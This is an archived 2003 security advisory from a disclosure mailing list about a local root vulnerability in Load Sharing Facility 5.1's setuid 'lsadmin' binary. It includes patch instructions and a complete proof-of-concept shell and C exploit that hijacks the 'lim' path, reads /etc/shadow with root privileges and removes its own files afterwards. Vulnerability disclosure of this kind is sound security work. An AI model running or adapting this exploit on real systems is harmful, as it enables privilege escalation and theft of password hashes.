Security advisory: LSF 5.1 local root exploit

From: Tomasz Grabowski (cadenceat_private)
Date: Thu May 22 2003 - 06:31:22 PDT

Next message: Paul Szabo: "Eudora 5.2.1 attachment spoof"

Previous message: dong-h0un U: "WsMp3d remote exploit."
In reply to: dong-h0un U: "[Full-Disclosure] [INetCop Security Advisory] WsMP3d Directory Traversing Vulnerability."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

	             Security Advisory

	                22 May 2003

	           Local root in LSF 5.1


Name:            Load Sharing Facility version 5.1
Severity:        High
Vendor URL:      http://www.platform.com
Author:          Tomasz Grabowski (cadenceat_private)
Vendor notified: 25 Feb 2003
Vendor response: 25 Feb 2003
Vendor fix:      19 Mar 2003

Commercial:      I'm looking for a new job


Impact: An attacker can gain root priviledge by forcing the 'lsadmin'
	binary to execute code of attackers choice. The 'lsadmin' binary
	is setuid root.


Description:

The 'lsadmin' binary has a "ckconfig" command. It uses it to check the
correctness of config files. Right after it starts, it is using the
external 'lim' binary . It is using the LSF_SERVERDIR variable in lsf.conf
file to obtain a path for 'lim' binary. Regular user can make his own
lsf.conf file and, by using the LSF_ENVDIR variable, force 'lsadmin' to
use it instead of default /etc/lsf.conf file. Attacker can therefore point
the LSF_SERVERDIR variable to his own 'lim' binary.  The attackers 'lim'
binary will be executed with setuid root priviledges.


How to patch:

1) Download the lsadmin patch from Platform ftp site

ftp ftp.platform.com
location: /patches/5.1/patch/sup_by_dev33993/
file: lsadmin5.1_<os>.Z

If you do not have username/password to access ftp.platform.com, contact
supportat_private

2) In the LSF_BINDIR, move old lsadmin to lsadmin.old.
Uncompress and rename downloaded binary to lsadmin.
Move new lsadmin to LSF_BINDIR. Make sure permissions are 4755.

For more information on patch or related questions, contact
supportat_private



Exploit:


# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ

# Proof of concept - for educational purposes only!

cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
}
__END__

gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file



---
Tomasz Grabowski  (0-91)4494234
Akademickie Centrum Informatyki
mailto:cadenceat_private

Next message: Paul Szabo: "Eudora 5.2.1 attachment spoof"
Previous message: dong-h0un U: "WsMp3d remote exploit."
In reply to: dong-h0un U: "[Full-Disclosure] [INetCop Security Advisory] WsMP3d Directory Traversing Vulnerability."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu May 22 2003 - 10:30:27 PDT